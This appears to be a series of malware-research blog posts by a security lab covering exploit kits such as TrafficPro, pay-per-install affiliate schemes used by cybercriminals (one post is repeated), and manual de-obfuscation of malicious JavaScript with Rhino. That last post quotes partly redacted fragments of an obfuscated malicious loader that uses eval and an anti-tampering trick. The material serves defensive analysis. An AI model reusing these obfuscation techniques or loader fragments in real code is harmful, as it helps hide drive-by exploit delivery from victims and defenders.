Kits for installing malware –> Traffic Pro
We have talked quite a few times about kits for installing malware, such as MPack and IcePack. Vicente has been studying for a while another kit called TrafficPro. Although it's older than MPack and IcePack, it's cheaper (about $20 – $40), that's why it has become so popular.
In order to access the control panel you have the typical login page:
Of course, you can check all the infections in detail:
For a detailed explanation of how it works, take a look at the report written by Vicente.
Greetings from Vienna
Virus Bulletin 2007 is taking place this week, at the Hilton Vienna Hotel. This event, which starts today and ends on Friday, offers a wide range of interesting conferences about typical issues in the security area, such as crimeware, spam, phishing and all kind of malware and antimalware techniques. The program can be viewed here.
Easy money: affiliate programs
Today we’re going to describe one of the ways the cybercriminals use to earn some easy money. There are many marketing companies that promote web traffic to different Web pages, software installations, etc. They use what they call 'affiliate programs', paying money for every software installed or traffic generated. This web traffic is very assorted: activex, rogue-antispywares, bundles, banners, fakecodecs, iframes, etc.
They usually pay depending on the country you obtain the download. Normally USA and Europe are the best paid countries and other countries as China or Russia are the worst paid.
Here we can see some examples obtained from these pages:
We will pay you for installs coming from 16 countries as exposed here :
$0.40 for USA, Canada
$0.20 for United Kingdom, France, Germany, Italy, Spain, Belgium, Luxembourg, Monaco
$0.05 for Austria, Denmark, Finland, Sweden, Norway, The Netherlands
$0.01 for China, Korea, Japan
Although some of these marketing enterprises can be well-intentioned, other have been specifically created by & for cybercriminals to earn money. Here we can see a gif file that was being used by one of these companies in order to advertise itself in an underground malware forum:
A short time ago, analyzing a Trj/Sinowal variant (a banking Trojan) to discover where it was sending the information to, we found one of these websites. We found out that this site had 4 different kits to install malware through exploits in the same server the page was hosted in:
There was an IcePack, a Traffic Pro, a Prime Exploit System, and a very basic kit that only used two exploits and had no name. These kits were downloading two Trojans: Trj/Galapoper and Trj/Sinowal. This is not the first time we see something similar.
The web sites where they promote themselves use to be very eye-catching, here you can see some examples:
Easy money: affiliate programs
Today we’re going to describe one of the ways the cybercriminals use to earn some easy money. There are many marketing companies that promote web traffic to different Web pages, software installations, etc. They use what they call ‘affiliate programs’, paying money for every software installed or traffic generated. This web traffic is very assorted: activex, rogue-antispywares, bundles, banners, fakecodecs, iframes, etc.
They usually pay depending on the country you obtain the download. Normally USA and Europe are the best paid countries and other countries as China or Russia are the worst paid.
Here we can see some examples obtained from these pages:
We will pay you for installs coming from 16 countries as exposed here :
$0.40 for USA, Canada
$0.20 for United Kingdom, France, Germany, Italy, Spain, Belgium, Luxembourg, Monaco
$0.05 for Austria, Denmark, Finland, Sweden, Norway, The Netherlands
$0.01 for China, Korea, Japan
Although some of these marketing enterprises can be well-intentioned, other have been specifically created by & for cybercriminals to earn money. Here we can see a gif file that was being used by one of these companies in order to advertise itself in an underground malware forum:
A short time ago, analyzing a Trj/Sinowal variant (a banking Trojan) to discover where it was sending the information to, we found one of these websites. We found out that this site had 4 different kits to install malware through exploits in the same server the page was hosted in:
There was an IcePack, a Traffic Pro, a Prime Exploit System, and a very basic kit that only used two exploits and had no name. These kits were downloading two Trojans: Trj/Galapoper and Trj/Sinowal. This is not the first time we see something similar.
The web sites where they promote themselves use to be very eye-catching, here you can see some examples:
JavaScript de-obfuscation with Rhino
Last Friday, I received a URL which used several exploits to spread malware. As always, I started to investigate it. As you may know, these sites use javascript to exploit web browser, ActiveX or third party vulnerabilities, and of course JS obfuscation is used most of the time.
I don’t like using web browsers to de-obfuscate these codes, basically because these js are dangerous and I want to avoid an infection. I know that some researchers use debugging techniques to de-obfuscate these js codes, but I really think there are safer, faster and more automated methods to do the same job.
I prefer to use Rhino to accomplish these tasks. Rhino is “an open-source implementation of JavaScript written entirely in Java“. With this js engine and a Linux system I’m able to de-obfuscate these codes, without using any web browser. I recommend you the CanWest presentation Reverse Engineering Malicious Javascript (Jose Nazario, Ph. D. Arbor).
I’m going to show the process with an example (the same js code I received on Friday).
This is a special case, because it uses a trick to avoid the modification of the code: arguments.callee.toString() (This call returns the code of the funcion where it’s called). Any modification of the code will affect the final result and therefore avoid an automated de-obfuscation of the code.
The js code has two functions: bodipyri(ii) and cynolapy(a1,b1). The Function’s names are dinamically generated every time the page is loaded. Analyzing the second function, I saw there was a return with an eval call:
function cynolapy(a1,b1)
{
if(!b1){
return eval(bodipyri(“ZG9jdW1lbnQud3JpdGUoY[DELETED]2csIiIpKSk7″)); }
[DELETED]
}
This function is first called only with an argument:
cynolapy(‘YSYsMTs5IHAkOGlvIid7ZDZ9IGo5cD4[DELETED]VrY2SVSXZnKzJakIk=’);
so the function cynolapy returns the eval result.
I deleted all the html code, changed the eval call with a print, and executed rhino against the file. This was the result:
document.write(cynolapy(a1,arguments.callee.toString().replace(/\s/g,”")));
The js code is recursively calling the same function but with a second argument. This new argument is the known arguments.callee.toString() trick used to avoid code modifications. Since I had modified eval with print, I was modifing the value of the second parameter and therefore changing the final result. That’s bad and avoided an automated de-obfuscation of the code. This example has to be manually de-obfuscated.
The arguments.callee.toString().replace(/\s/g,”")) function returns the cynolapy function source code and then strips all white spaces.
Therefore, in order to to get the real js code we have to call this function with this second argument. I got the original js code again (with the eval call), and added the following code at the end of the file:
print cynolapy(‘YSYsMTs5IHAkNGlhIj97aDZ9[DELETED]24viw==’,'functiontumawyzu(a1,b1){if(!b1){returneval(cynolapy(“ZG9[DELETED]returno;}’);
What I’m doing here is calling cynolapy function with the expected second parameter. After parsing this code with Rhino this is the resulting code:
This de-obfuscated code is loading an iframe with a new site. This site is used to exploit several vulnerabilities: ANI/ANR, Java/ByteVerify, ADODB.Stream,…
PandaLabs is developing an automated engine to de-obfuscate js, but sometimes it’s not possible and we need to do it manually.